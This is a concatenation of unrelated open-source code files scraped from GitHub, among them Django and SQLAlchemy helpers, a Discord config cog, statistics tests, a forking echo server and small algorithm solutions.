                                           long__lte=float(long) + 0.5, long__gte=float(long) - 0.5,
                                           scan_time__lt=dt, scan_time__gt=pdt).order_by('-scan_time')
            else:
                # One product: its 10 most recent scans before dt in the same area.
                queryset = queryset.filter(lat__lte=float(lat) + 0.5, lat__gte=float(lat) - 0.5,
                                           long__lte=float(long) + 0.5, long__gte=float(long) - 0.5,
                                           product=id, scan_time__lt=dt).order_by('-scan_time')[:10]
        return queryset
| gdoganieri/backendfindprice | apps/findprice/views.py | views.py | py | 2,711 | python | en | code | 0 | github-code | 36 |
7638888119 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 29 17:03:06 2014
@author: aaron
"""
import neblina as nb ### Module for neblina interpreter.
import operators as op ### Module for operators functions.
import ioFunctions as io ### Module for write on disk functions.
import gnuplot as gnuplot ### Module for Gnuplot functions.
import config as cfg ### Module for global variables for Quantum Walk.
import standardDeviation as sd ### Module for Standard Deviation functions.
import numpy as np
import testmode
def run():
probabilities=[]
if not cfg.OVERLAP:
cfg.OVERLAPX=int(cfg.TESSELLATIONPOLYGONS[0])
io.savetxt("HIPERWALK_TEMP_PSI.dat",cfg.STATE,float,'%1.16f')
op.STAGGERED1D()
sd.distances_vector_1D(cfg.RANGEX[0],cfg.RANGEX[1])
cfg.DISTANCE_VECTOR_SIZE=cfg.GRAPHSIZE
# nb.generating_STAGGERED1D_NBL()
nb.runCore_STAGGERED1D()
cfg.STATE=nb.neblina_state_to_vector("NEBLINA_TEMP_final_state.dat")
probabilities=nb.neblina_distribution_to_vector("NEBLINA_TEMP_final_distribution.dat")
output = open("final_distribution.dat",'w')
output1 = open("final_state.dat",'w')
output.write("#POSITION \t PROBABILITY\n")
output1.write("#POSITION \t Re(amplitude) \t \t \t Im(amplitude)\n")
for i in range(int(cfg.GRAPHSIZE)):
output.write("%d \t \t \t%1.16f\n"%(cfg.RANGEX[0]+i,probabilities[i]))
output1.write("%d \t \t \t%1.16f\t\t\t%1.16f\n"%(cfg.RANGEX[0]+i,cfg.STATE[i].real,cfg.STATE[i].imag))
output.close()
output1.close()
if cfg.GNUPLOT:
io.savetxt("HIPERWALK_TEMP_PROBABILITIES.dat",probabilities,float,'%1.16f')
gnuplot.template_STAGGERED1D("HIPERWALK_TEMP_PROBABILITIES.dat","final_distribution.eps","EPS")
if cfg.STEPS>1:
gnuplot.plotStatistics1D()
if cfg.ANIMATION == 1:
gnuplot.plotAnimation1D()
if cfg.TEST_MODE:
modelVector=testmode.create_STAGGERED1D_test_vector()
returnNeblina=nb.neblina_distribution_to_vector("NEBLINA_TEMP_final_distribution.dat")
if np.linalg.norm(modelVector-returnNeblina,np.inf) == float(0):
return 1
else:
return 0
return 1 | hiperwalk/hiperwalk | Archive/staggered1d.py | staggered1d.py | py | 2,333 | python | en | code | 6 | github-code | 36 |
74285321704 | import numpy as np
from point_charge_ewald.atom import Atom
from random import sample
def flatten( l ):
    """Concatenate the sub-sequences of *l* into a single flat list."""
    flat = []
    for sublist in l:
        flat.extend(sublist)
    return flat
class Species():
    """A point-charge species: *number* atoms of charge *q* placed on allowed sites."""
    def __init__( self, label, number, q, fixed, allowed_sites, sites ):
        self.label = label
        self.number = number
        self.q = q
        self.fixed = fixed
        self.allowed_sites = allowed_sites
        self.assign_atoms_to_sites( sites )
    def assign_atoms_to_sites( self, sites ):
        """Randomly occupy *number* free, allowed sites with new Atom objects.

        NOTE(review): occupancy is tested via ``s.is_occupied`` but recorded via
        ``site.occupied_by`` -- presumably ``is_occupied`` is a property derived
        from ``occupied_by``; confirm in the Site class.
        """
        # Free sites whose label this species is allowed to occupy.
        sites_to_occupy = [ s for s in sites if not s.is_occupied
            if s.label in self.allowed_sites ]
        print( "{} available sites for species {}".format( len( sites_to_occupy ), self.label ) )
        assert( len( sites_to_occupy ) >= self.number )
        self.atoms = []
        for site in sample( sites_to_occupy, self.number ):
            this_atom = Atom( self.label, self.q, self.fixed, self.allowed_sites )
            site.occupied_by = this_atom
            self.atoms.append( this_atom )
| bjmorgan/point_charge_ewald | point_charge_ewald/species.py | species.py | py | 1,054 | python | en | code | 1 | github-code | 36 |
class Solution:
    def rotate(self, matrix: List[List[int]]) -> None:
        """
        Do not return anything, modify matrix in-place instead.
        """
        # Rotate 90 degrees clockwise in place: transpose, then mirror each row.
        n = len(matrix)
        for i in range(n):
            for j in range(i + 1, n):
                matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]
        for row in matrix:
            row.reverse()
| Exile404/LeetCode | LEETCODE_Rotate Image.py | LEETCODE_Rotate Image.py | py | 414 | python | en | code | 2 | github-code | 36 |
74060635624 | """
Twilio API NTS token
"""
import asyncio
from functools import partial
from twilio.rest import Client as TwilioRestClient
from server.config import config
class TwilioNTS:
    """
    Twilio NTS Token Service

    Creates new twilio NTS tokens
    """
    def __init__(self, sid=None, token=None):
        # Fall back to application configuration when credentials are omitted.
        if sid is None:
            sid = config.TWILIO_ACCOUNT_SID # pragma: no cover
        if token is None:
            token = config.TWILIO_TOKEN # pragma: no cover
        self.twilio_account_sid = sid
        self.twilio_token = token
        self.client = TwilioRestClient(self.twilio_account_sid, self.twilio_token)
    async def server_tokens(self, ttl=None) -> list[dict[str, str]]:
        """
        Fetches token from Twilio

        # Params
        - `ttl`: ttl in seconds
        """
        if ttl is None:
            ttl = config.TWILIO_TTL # pragma: no cover
        # The twilio client is blocking: run the token request in the default
        # executor so the event loop is not stalled. ``ttl`` is passed
        # positionally to tokens.create.
        loop = asyncio.get_running_loop()
        token = await loop.run_in_executor(None, partial(self.client.tokens.create, ttl))
        return token.ice_servers
| FAForever/server | server/ice_servers/nts.py | nts.py | py | 1,056 | python | en | code | 64 | github-code | 36 |
1818161052 | #!/usr/bin/python3
import os
import socket
import socketserver
import threading
SERVER_HOST = 'localhost'
SERVER_PORT = 9999
BUF_SIZE = 1024
ECHO_MSG = 'Hello echo server!'
class ForkingClient():
    """Simple TCP echo client used to exercise the forking server."""
    def __init__(self, ip, port):
        # Create a TCP socket and connect immediately.
        self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.sock.connect((ip,port))
    def run(self):
        """Send the echo message and print the server's response."""
        current_process_id = os.getpid()
        print('PID %s Sending echo message to the server:"%s"' % (current_process_id,ECHO_MSG))
        sent_data_length = self.sock.send(bytes(ECHO_MSG, 'UTF-8'))
        print("Sent : %d characters,so far..." %sent_data_length)
        # Block until (up to BUF_SIZE bytes of) the reply arrives.
        response = self.sock.recv(BUF_SIZE)
        print("PID %s received: %s" %(current_process_id,response))
    def shutdown(self):
        """Close the client socket."""
        self.sock.close()
class ForkingServerRequestHandler(socketserver.BaseRequestHandler):
    """Per-connection handler; each instance runs in a forked child process."""
    def handle(self):
        # Include this child's PID so clients can observe distinct processes.
        data = 'Hello echo client!'
        current_process_id = os.getpid()
        response = '%s: %s' % (current_process_id,data)
        print ("Server sending response : %s" %response)
        self.request.send(bytes(response,'UTF-8'))
        return
class ForkingServer(socketserver.ForkingMixIn,socketserver.TCPServer,):
    """TCP server that forks a child process per incoming connection."""
    def __init__(self, server_address, RequestHandlerClass):
        # Allow quick restarts on the same port (SO_REUSEADDR).
        self.allow_reuse_address = True
        socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass)
def main():
    """Start the forking echo server, run two clients against it, then shut down."""
    server = ForkingServer((SERVER_HOST,SERVER_PORT),ForkingServerRequestHandler)
    ip, port = server.server_address
    # Serve in a background thread so the clients can run in this one.
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.start()
    print ('Server loop running PID: %s ' % os.getpid())
    client1 = ForkingClient(ip,port)
    client1.run()
    client2 = ForkingClient(ip,port)
    client2.run()
    client1.shutdown()
    client2.shutdown()
    server.shutdown()
    server.socket.close()
main()
| veryfreebird/codebase | pyexec/py3/9-networks-forking.py | 9-networks-forking.py | py | 1,995 | python | en | code | 2 | github-code | 36 |
19909624310 | """MAIN MODULE TO RUN"""
from datetime import datetime
import stonk_functions as func
#gets the top sector for the week
sectorOG = func.get_sector()
sector = (sectorOG.replace(' ','')).lower()
#gets todays date
day = datetime.today().strftime('%A')
if day.lower() in ("saturday", "sunday"):
day = "Friday"
today = datetime.now()
date = (f"{today.strftime('%B')} {today.day}")
"""Add Link for Criteria Here using https://finviz.com/screener.ashx"""
#the urls for stock criteria
win_sector = f"https://finviz.com/screener.ashx?v=111&f=sec_{sector},sh_avgvol_o1000,sh_price_o5,sh_relvol_o1.5,targetprice_above&ft=4"
rsi = "https://finviz.com/screener.ashx?v=211&f=sh_avgvol_o1000,sh_price_o5,ta_rsi_os30,ta_sma200_pa,targetprice_above&ft=4"
"""Add New Criteria Variable to urls Dict and assign a label"""
#dict of criteria urls and there label
urls = {win_sector: f"{sectorOG} Winners", rsi : "Oversold"}
#gets the stocks for each criteria and adds them to the stonks dict
stonks = func.get_stocks(urls)
#gets todays watchlist listing
main_str = func.get_main(day,stonks)
#gets current watchlist contents
with open("watchlist.txt", 'r') as file:
contents = file.read()
#if its Monday, start a new watchlist
if day == 'Monday':
with open("watchlist.txt", 'w') as file:
file.write(main_str + '\n')
#if its not Monday, add todays stocks to the current watchlist
else:
content_list = contents.split('\n\n')
#remove the current days entry if its there to make space for updated entry
with open("watchlist.txt", "w") as f:
for i in content_list:
if day not in i:
f.write(f"{i}\n")
f.truncate()
#add todays entry
with open("watchlist.txt", 'a') as file:
file.write(main_str + '\n')
#gets weeks updated wathlist and prints it
with open("watchlist.txt", 'r') as file:
contents = file.read()
print('Watchlist', date)
print(contents)
| abbasn785/Stock-Market-Watchlist-Assistant | stonks.py | stonks.py | py | 2,001 | python | en | code | 0 | github-code | 36 |
28721703847 | import warnings
import statsmodels.api as sm
from statsmodels.stats.outliers_influence import variance_inflation_factor
def print_vif(x):
"""Utility for checking multicollinearity assumption
:param x: input features to check using VIF. This is assumed to be a pandas.DataFrame
:return: nothing is returned the VIFs are printed as a pandas series
"""
# Silence numpy FutureWarning about .ptp
with warnings.catch_warnings():
warnings.simplefilter("ignore")
x = sm.add_constant(x)
vifs = []
for i in range(x.shape[1]):
vif = variance_inflation_factor(x.values, i)
vifs.append(vif)
print('VIF results\n-------------------------------')
print(pd.Series(vifs, index=x.columns))
print('-------------------------------\n') | Ninjaneer1/theWorks | print_vif.py | print_vif.py | py | 803 | python | en | code | 0 | github-code | 36 |
15867444691 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from typing import Any, Dict, Generic, Type, TypeVar, NoReturn
from pydantic import BaseModel
from sqlalchemy import select, update, delete, and_
from sqlalchemy.ext.asyncio import AsyncSession
from backend.app.models.base import MappedBase
ModelType = TypeVar('ModelType', bound=MappedBase)
CreateSchemaType = TypeVar('CreateSchemaType', bound=BaseModel)
UpdateSchemaType = TypeVar('UpdateSchemaType', bound=BaseModel)
class CRUDBase(Generic[ModelType, CreateSchemaType, UpdateSchemaType]):
    """Generic async CRUD helper bound to a single SQLAlchemy model class."""
    def __init__(self, model: Type[ModelType]):
        self.model = model
    async def get_(
        self,
        db: AsyncSession,
        *,
        pk: int | None = None,
        name: str | None = None,
        status: int | None = None,
        del_flag: int | None = None,
    ) -> ModelType | None:
        """
        Fetch a single row selected by primary key *or* by name.

        :param db: async session
        :param pk: primary key (mutually exclusive with ``name``)
        :param name: name value (mutually exclusive with ``pk``)
        :param status: optional status filter, 0 or 1
        :param del_flag: optional soft-delete filter, 0 or 1
        :return: the matching row, or None
        """
        # Exactly one of pk / name must be given. The two assertion messages
        # were swapped relative to their conditions in the original: the first
        # check fails when BOTH are empty, the second when BOTH are present.
        assert pk is not None or name is not None, '查询错误, pk 和 name 参数不能同时为空'
        assert pk is None or name is None, '查询错误, pk 和 name 参数不能同时存在'
        where_list = [self.model.id == pk] if pk is not None else [self.model.name == name]
        if status is not None:
            assert status in (0, 1), '查询错误, status 参数只能为 0 或 1'
            where_list.append(self.model.status == status)
        if del_flag is not None:
            assert del_flag in (0, 1), '查询错误, del_flag 参数只能为 0 或 1'
            where_list.append(self.model.del_flag == del_flag)
        result = await db.execute(select(self.model).where(and_(*where_list)))
        return result.scalars().first()
    async def create_(self, db: AsyncSession, obj_in: CreateSchemaType, user_id: int | None = None) -> None:
        """
        Insert one row built from the pydantic payload.

        Note: the return annotation was ``NoReturn`` in the original, which
        means "never returns"; this coroutine returns None normally.

        :param db: async session
        :param obj_in: pydantic model carrying the column values
        :param user_id: optional id recorded in ``create_user``
        """
        if user_id:
            create_data = self.model(**obj_in.dict(), create_user=user_id)
        else:
            create_data = self.model(**obj_in.dict())
        db.add(create_data)
    async def update_(
        self, db: AsyncSession, pk: int, obj_in: UpdateSchemaType | Dict[str, Any], user_id: int | None = None
    ) -> int:
        """
        Update one row selected by primary key.

        :param db: async session
        :param pk: primary key of the row to update
        :param obj_in: pydantic model or plain dict of column values
        :param user_id: optional id recorded in ``update_user``
        :return: number of affected rows
        """
        if isinstance(obj_in, dict):
            update_data = obj_in
        else:
            # Only touch the fields the client actually sent.
            update_data = obj_in.dict(exclude_unset=True)
        if user_id:
            update_data.update({'update_user': user_id})
        result = await db.execute(update(self.model).where(self.model.id == pk).values(**update_data))
        return result.rowcount
    async def delete_(self, db: AsyncSession, pk: int, *, del_flag: int | None = None) -> int:
        """
        Delete one row by primary key; pass ``del_flag=1`` for a soft delete.

        :param db: async session
        :param pk: primary key of the row to delete
        :param del_flag: None for a hard delete, 1 to set the soft-delete flag
        :return: number of affected rows
        """
        if del_flag is None:
            result = await db.execute(delete(self.model).where(self.model.id == pk))
        else:
            assert del_flag == 1, '删除错误, del_flag 参数只能为 1'
            result = await db.execute(update(self.model).where(self.model.id == pk).values(del_flag=del_flag))
        return result.rowcount
| fastapi-practices/fastapi_best_architecture | backend/app/crud/base.py | base.py | py | 3,602 | python | en | code | 96 | github-code | 36 |
69905055783 | from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from django.shortcuts import get_object_or_404
from .models import Genre, Movie, Comment
import requests
from .serializers import(
MovieListSerializer,
MovieSerializer,
CommentListSerializer,
CommentSerializer,
GenreSerializer,
)
from movies import serializers
# Create your views here.
# SECURITY(review): TMDB API key hardcoded in source — move it to settings or
# an environment variable and rotate the key before deploying.
MYKEY = 'fb9a96092cd1259e59917287f35839c8'
def getGenre(request):
    """Fetch the TMDB genre list (Korean locale) and upsert it into Genre."""
    url = f'https://api.themoviedb.org/3/genre/movie/list?api_key={MYKEY}&language=ko-KR'
    response = requests.get(url)
    for genre in response.json().get('genres'):
        Genre.objects.get_or_create(
            id=genre.get('id'),
            name=genre.get('name'),
        )
    return
def getMovie(request):
    """Populate the Movie table from TMDB's discover endpoint and link genres."""
    # Loop over result pages so enough movies get stored in the DB.
    for n in range(1, 20):
        movieURL = f'https://api.themoviedb.org/3/discover/movie?api_key={MYKEY}&language=ko-KR&page={str(n)}'
        # Fetch one page of movie data from the TMDB API.
        allMovie = requests.get(movieURL)
        # The payload nests the movies under the 'results' key.
        datas = allMovie.json().get('results')
        for data in datas:
            Movie.objects.get_or_create(
                # Pick the fields we care about and map them onto the model.
                movie_id = data.get('id'),
                title = data.get('original_title'),
                overview = data.get('overview'),
                release_date = data.get('release_date'),
                voteavg = data.get('vote_average'),
                # TMDB returns a relative path; prefix the image host for a full URL.
                poster_path = "https://image.tmdb.org/t/p/original"+ data.get('poster_path'),
            )
            # Build the M:N relation between this movie and its genre ids,
            # so movies can later be queried per genre.
            genreItems = data.get('genre_ids')
            # Re-fetch the row we just created/loaded for this movie_id.
            movie = Movie.objects.get(movie_id = data.get('id'))
            # One movie can carry several genre ids, so add each in turn.
            for i in genreItems:
                p1 = get_object_or_404(Genre, pk=i)
                # Attach the genre to the movie's M:N field.
                movie.genres.add(p1)
    return
# Fetch the movies belonging to one genre.
@api_view(['GET'])
def movie_genre(request, genre_id):
    """List every movie linked to the genre with pk ``genre_id``."""
    queryset = Movie.objects.filter(genres=genre_id)
    return Response(data=MovieListSerializer(queryset, many=True).data)
# Fetch every genre.
@api_view(['GET'])
def all_movie_genre(request):
    """Return the full list of genres."""
    serializer = GenreSerializer(Genre.objects.all(), many=True)
    return Response(data=serializer.data)
@api_view(['GET']) # when a GET request comes in
def movie_list(request):
    """Return every movie serialized with the list serializer."""
    movies = Movie.objects.all()
    # Load all rows of the Movie model,
    serializer = MovieListSerializer(movies, many=True)
    # serialize them (many=True is required for a queryset of several objects),
    return Response(data=serializer.data)
    # and return the serialized data via the Response's data keyword argument.
@api_view(['GET'])
def movie_detail(request, movie_id):
    """Return one movie selected by its primary key.

    Uses get_object_or_404 (consistent with comment_list/comment_detail in
    this module), so a missing id yields a 404 response instead of an
    unhandled Movie.DoesNotExist and a 500.
    """
    movie = get_object_or_404(Movie, pk=movie_id)
    serializer = MovieSerializer(movie)
    # Single object, so many=True is not needed.
    return Response(data=serializer.data)
# Load the comments for one movie.
@api_view(['GET', 'POST'])
def comment_list(request, movie_id):
    """GET: list the comments of a movie. POST: create a comment on it."""
    movie = get_object_or_404(Movie, pk=movie_id)
    # Fetch the individual movie first (404 if it does not exist).
    if request.method == 'GET':
        # Plain read (GET request):
        comment = Comment.objects.filter(comment_movie=movie)
        # select only the comments attached to this movie,
        serializer = CommentListSerializer(comment, many=True)
        # serialize them,
        return Response(data=serializer.data)
        # and return them.
    elif request.method == 'POST':
        # Creation (POST request):
        serializer = CommentListSerializer(data=request.data)
        # wrap the submitted payload in the serializer, then validate.
        if serializer.is_valid(raise_exception=True):
            # raise_exception=True makes DRF return a proper error response
            # automatically when the payload is invalid.
            serializer.save(comment_movie=movie)
            # Save the comment attached to this movie,
            return Response(data=serializer.data, status=status.HTTP_201_CREATED)
            # and reply 201 to signal a successful creation.
# Load the comments written by one user.
@api_view(['GET'])
def comment_list_by_user(request, user_id):
    """List every comment whose author is ``user_id``."""
    comment = Comment.objects.filter(comment_user=user_id)
    # Select only the comments whose comment_user matches the given user,
    serializer = CommentListSerializer(comment, many=True)
    # serialize them,
    return Response(data=serializer.data)
    # and return them.
@api_view(['GET', 'PUT', 'DELETE'])
def comment_detail(request, movie_id, comment_id):
    """Read, update or delete a single comment belonging to a movie."""
    movie = get_object_or_404(Movie, pk=movie_id)
    # Fetch the individual movie,
    comment = get_object_or_404(Comment, pk=comment_id, comment_movie=movie)
    # then the comment that belongs to it (404 if it belongs to another movie).
    if request.method == 'GET':
        # Plain read:
        serializer = CommentSerializer(comment)
        # serialize
        return Response(data=serializer.data)
        # and return.
    elif request.method == 'PUT':
        # Update request:
        serializer = CommentSerializer(comment, data=request.data, partial=True)
        # replace the stored data with the submitted data;
        # partial=True lets the client send only the fields being changed.
        if serializer.is_valid(raise_exception=True):
            serializer.save()
            return Response(data=serializer.data)
    elif request.method == 'DELETE':
        # Delete request:
        comment.delete()
        # remove the comment
        data = {
            'message': '성공적으로 삭제되었습니다!'
        }
        # and reply with a confirmation message
        return Response(data=data, status=status.HTTP_204_NO_CONTENT)
        # using HTTP 204 No Content.
| jhs9497/MovieRecommendSite | backend/movies/views.py | views.py | py | 6,928 | python | ko | code | 0 | github-code | 36 |
class Stacke:
    """Fixed-capacity stack backed by a preallocated list.

    Quirks of the original API are kept: ``pop``/``peak`` return the string
    "Stack empty" (rather than raising) when the stack is empty, and ``push``
    prints a message on overflow instead of raising.
    """

    def __init__(self, size) -> None:
        self.top = -1          # index of the current top element; -1 == empty
        self.arr = [0] * size  # preallocated storage
        self.size = size       # fixed capacity

    def push(self, data):
        """Push ``data``; on overflow, print a warning and drop the value."""
        # (removed a leftover debug print of self.top)
        if self.top < self.size - 1:
            self.top += 1
            self.arr[self.top] = data
        else:
            print("Stack overflow at", data)

    def pop(self):
        """Remove and return the top element, or "Stack empty"."""
        if self.top >= 0:
            data = self.arr[self.top]
            self.arr[self.top] = 0  # clear the slot to avoid stale references
            self.top -= 1
            return data
        else:
            return "Stack empty"

    def peak(self):
        """Return the top element without removing it, or "Stack empty"."""
        if self.top >= 0:
            return self.arr[self.top]
        else:
            return "Stack empty"
if __name__ == '__main__':
    # Quick manual exercise of the stack: capacity 4, so the fifth push
    # overflows and is dropped with a printed warning.
    sta = Stacke(4)
    sta.push(5)
    sta.push(4)
    sta.push(1)
    sta.push(0)
    sta.push(44)
    print(sta.peak())
    sta.pop()
    print(sta.peak())
    sta.push(23)
    print(sta.peak())
| Manoj-895/DSA-Python | Stack/Stack.py | Stack.py | py | 916 | python | en | code | 0 | github-code | 36 |
26211280111 | import sys
sys.stdin = open('input.txt')
T = 10
# 결과
#1 67 ...
for _ in range(1, T+1):
tc = int(input()) # 사다리번호
ladder = [list(map(int, input().split())) for _ in range(100)]
for i in range(100):
# 도착지를 찾는 코드
if ladder[99][i] == 2:
x = i
y = 99
# y == 0 되는 시점 = > 제일 윗줄 도착, while문 종료
while y > 0:
# 현재 위치 기준, 좌/우를 체크 (x는 가로축 , y는 세로축)
# 예외처리 분기문
# 제일 오른쪽과 제일 왼쪽이 아니라면 > 좌우를 살펴보세요
if x != 99 and x != 0:
# 왼쪽 길이 있는 경우
if ladder[y][x-1] == 1:
ladder[y][x] = 0 # 내가 있던자리 0으로 설정
x -= 1 # 왼쪽으로 이동
continue
# 오른쪽 길이 있는 경우
if ladder[y][x+1] == 1:
ladder[y][x] = 0 # 내가 있던자리 0으로 설정
x += 1 # 오른쪽으로 이동
continue
# 제일 오른쪽이라면 > 왼쪽만 살펴보세요
elif x == 99:
# 왼쪽 길이 있는 경우
if ladder[y][x-1] == 1:
ladder[y][x] = 0 # 내가 있던자리 0으로 설정
x -= 1 # 왼쪽으로 이동
continue
# 제일 왼쪽이라면 > 오른쪽만 살펴보세요
elif x == 0:
# 오른쪽 길이 있는 경우
if ladder[y][x+1] == 1:
ladder[y][x] = 0 # 내가 있던자리 0으로
x += 1 # 오른쪽으로 이동
continue
# 왼쪽도 오른쪽도 길이 없는 경우
ladder[y][x] = 0 # 내가 있던자리 0으로
y -= 1 # 올라감
result = x
print(result) | hong00009/algo | swea/1210_ladder/sol1.py | sol1.py | py | 1,895 | python | ko | code | 0 | github-code | 36 |
712417785 | from unittest import TestCase
from . import TreeNode
from .search_in_a_binary_tree import SearchInABinaryTree
class SearchInABinaryTreeTest(TestCase):
    """Unit tests for SearchInABinaryTree.searchBST."""

    def test_existing_inputs(self):
        # Searching for 2 in the BST rooted at 4 must return the entire
        # subtree rooted at the node whose value is 2.
        solution = SearchInABinaryTree()
        subtree: TreeNode = TreeNode(2, left=TreeNode(1), right=TreeNode(3))
        self.assertEqual(
            subtree,
            solution.searchBST(
                TreeNode(
                    4,
                    left=subtree,
                    right=TreeNode(7),
                ),
                2,
            ),
        )

    def test_notfound_input(self):
        # NOTE(review): expects searchBST to return [] when the value is
        # absent — confirm the implementation really returns an empty list
        # rather than None (LeetCode's usual contract is None).
        solution = SearchInABinaryTree()
        self.assertEqual(
            [],
            solution.searchBST(
                TreeNode(
                    4,
                    left=TreeNode(2, left=TreeNode(1), right=TreeNode(3)),
                    right=TreeNode(7),
                ),
                5,
            ),
        )
2769538888 | import discord.ext.commands as disextc
import logging as lg
import yaml as yl
log = lg.getLogger(__name__)
class Config(disextc.Cog):
""" Configuration handler for the bot.
This is a yml file representation. Each configuration stored should be
under its own key:
discord:
exampledata1
exampledata2
reddit:
exampledata
Between the database and env vars for credentials, this should only be
used for things that would be beneficial to change at runtime.
This file should most optimally be 'read' before used, and 'saved' after
being altered. The defaults should be stored in each cog that utilizes
them.
Anything that is 'memory' should be stored in persistent memory cog.
Attributes:
-------------------------------------------
bot -> The bot that was initialized with the cog.
data -> a dictionary representation of the config file
"""
def __init__(self, bot: disextc.Bot):
super().__init__()
self.bot = bot
self.data = {}
# Listeners
@disextc.Cog.listener()
async def on_ready(self):
""" Initialize the config cog. """
# TODO: Change the config load into a retry-system.
# NOTE: This needs to be done immediately to ensure that other cogs
# won't have to wait long on it.
await self.load_config()
await self.bot.wait_until_ready()
txt_config_on_ready = "on_ready config cog fired."
log.debug(txt_config_on_ready)
# Helpers
async def load_config(self):
""" Loads config from Redis."""
# TODO: Error handling?
memory = self.bot.get_cog('Memory')
if memory is None:
raise RuntimeError('Could not get memory cog to save config.')
from cogs.memory import redis_db_config
pool = await memory.get_redis_pool(redis_db_config)
self.data = yl.safe_load(await pool.get('config'))
pool.close()
await pool.wait_closed()
log.info(f'Config Loaded')
async def save_config(self):
""" Saves config to Redis."""
# TODO: Error handling?
memory = self.bot.get_cog('Memory')
if memory is None:
raise RuntimeError('Could not get memory cog to save config.')
from cogs.memory import redis_db_config
pool = await memory.get_redis_pool(redis_db_config)
result = await pool.set('config', yl.safe_dump(self.data))
pool.close()
await pool.wait_closed()
log.debug(f'Save config results: {result}')
# Config Command Group
@disextc.group(name='con', hidden=True)
@disextc.is_owner()
async def config_group(self, ctx: disextc.Context):
"""Group for config cog commands."""
# TODO: more Gracefully
if ctx.invoked_subcommand is None:
await ctx.send('No config subcommand given.')
@config_group.command(name='show', hidden=True)
@disextc.is_owner()
async def show_config_command(self, ctx: disextc.Context):
"""Dumps current config into ctx. """
await ctx.send('```' + repr(self.data) + '```')
def setup(bot: disextc.Bot) -> None:
    """ Loads config cog. """
    # Standard discord.py extension entry point.
    bot.add_cog(Config(bot))
| guitaristtom/pythonbot-core | bot/cogs/config.py | config.py | py | 3,262 | python | en | code | 0 | github-code | 36 |
35970793791 | import numpy as np
from st_ops import st_ops
class PG(object):
    """Proximal-gradient (ISTA-style) step for an L1-regularized quadratic."""

    def __init__(self, lam, A, lr):
        # lam: L1 regularization weight.
        self.lam = lam
        if lr is None:
            # self.lr stores the *inverse* step size: slightly above the
            # largest eigenvalue of the Hessian 2A (a Lipschitz bound), so
            # the step used in update() is 1/self.lr.
            # NOTE(review): np.linalg.eig can return complex eigenvalues for
            # non-symmetric A — assumes A is symmetric; confirm.
            self.lr = 1.01 * np.max(np.linalg.eig(2 * A)[0])
        else:
            self.lr = lr

    def update(self, grad, params):
        # Gradient step with step size 1/self.lr ...
        next_params = params - 1/self.lr * grad
        # ... then the proximal operator for the L1 term (st_ops presumably
        # implements soft thresholding — see its import; confirm).
        params = st_ops(next_params, self.lam * 1 / self.lr)
        return params
| sff1019/ARTT458_midterm | problem_7/optimizers/pg.py | pg.py | py | 418 | python | en | code | 0 | github-code | 36 |
71311470503 | import numpy as np
from sklearn.utils.validation import check_array, check_scalar
from scipy import stats
def z_test_one_sample(sample_data, mu_0, sigma, test_type="two-sided"):
"""Perform a one-sample z-test.
Parameters
----------
sample_data : array-like of shape (n_samples,)
Sample data drawn from a population.
mu_0 : float or int
Population mean assumed by the null hypothesis.
sigma: float
True population standard deviation.
test_type : {'right-tail', 'left-tail', 'two-sided'}
Specifies the type of test for computing the p-value.
left-tail: Intergral links bis pvalue
right-tail: 1 - Integral links bis pvalue
two-sided: min etc.
Returns
-------
z_statistic : float
Observed z-transformed test statistic.
p : float
p-value for the observed sample data.
"""
# Check parameters.
sample_data = check_array(sample_data, ensure_2d=False)
mu_0 = check_scalar(mu_0, name="mu_0", target_type=(int, float))
sigma = check_scalar(sigma, name="sigma", target_type=(int, float), min_val=0, include_boundaries="neither")
if test_type not in ["two-sided", "left-tail", "right-tail"]:
raise ValueError("`test_type` must be in `['two-sided', 'left-tail', 'right-tail']`")
# empirical mean
empirical_mean = np.mean(sample_data)
# sample size
sample_size = len(sample_data)
# z_statistic
# kommen empirical means aus gleichen Distributions?
z_statistic = (empirical_mean - mu_0) / (sigma / np.sqrt(sample_size))
# p-value
# depends on test_type
p_left = stats.norm.cdf(z_statistic)
p_right = 1 - p_left
if test_type == "left-tail":
p = p_left
elif test_type == "right-tail":
p = p_right
else:
p = 2 * min(p_left, p_right)
return z_statistic, p
def t_test_one_sample(sample_data, mu_0, test_type="two-sided"):
    """Perform a one-sample t-test.

    Parameters
    ----------
    sample_data : array-like of shape (n_samples,)
        Sample data drawn from a population.
    mu_0 : float or int
        Population mean assumed by the null hypothesis.
    test_type : {'right-tail', 'left-tail', 'two-sided'}
        Specifies the type of test for computing the p-value.

    Returns
    -------
    t_statistic : float
        Observed t-transformed test statistic.
    p : float
        p-value for the observed sample data.

    Variance is estimated from the sample data (not given like in z-test).
    """
    # Check parameters.
    sample_data = check_array(sample_data, ensure_2d=False)
    mu_0 = check_scalar(mu_0, name="mu_0", target_type=(int, float))
    if test_type not in ["two-sided", "left-tail", "right-tail"]:
        raise ValueError("`test_type` must be in `['two-sided', 'left-tail', 'right-tail']`")
    # Empirical mean of the sample.
    empirical_mean = np.mean(sample_data)
    # Empirical standard deviation.
    # ddof=1: divisor is N - 1 (unbiased sample estimate), not N.
    empirical_sigma = np.std(sample_data, ddof=1)
    # Sample size.
    sample_size = len(sample_data)
    # t statistic: does the empirical mean come from the assumed distribution?
    # Sigma is not given, so it is estimated from the sample; degrees of
    # freedom = sample_size - 1 (the last point is determined by the other
    # N-1 points and the mean).
    t_statistic = (empirical_mean - mu_0) / (empirical_sigma / np.sqrt(sample_size))
    # p-value; which tail(s) are used depends on test_type.
    p_left = stats.t.cdf(t_statistic, df=sample_size - 1) # df = degrees of freedom
    p_right = 1 - p_left
    if test_type == "left-tail":
        p = p_left
    elif test_type == "right-tail":
        p = p_right
    else:
        p = 2 * min(p_left, p_right)
    return t_statistic, p
| KlaraGtknst/e2ml_SoSe23 | e2ml/e2ml/evaluation/_one_sample_tests.py | _one_sample_tests.py | py | 3,888 | python | en | code | 0 | github-code | 36 |
73583264105 | import phunspell
import inspect
import unittest
class TestPtBR(unittest.TestCase):
    """Spell-check lookups against the Brazilian Portuguese dictionary."""
    # One shared Phunspell instance for the whole class: loading the
    # dictionary is done once, at class-definition time.
    pspell = phunspell.Phunspell('pt_BR')
    def test_word_found(self):
        # A valid pt_BR word must be found.
        self.assertTrue(self.pspell.lookup("ecocardiografável"))
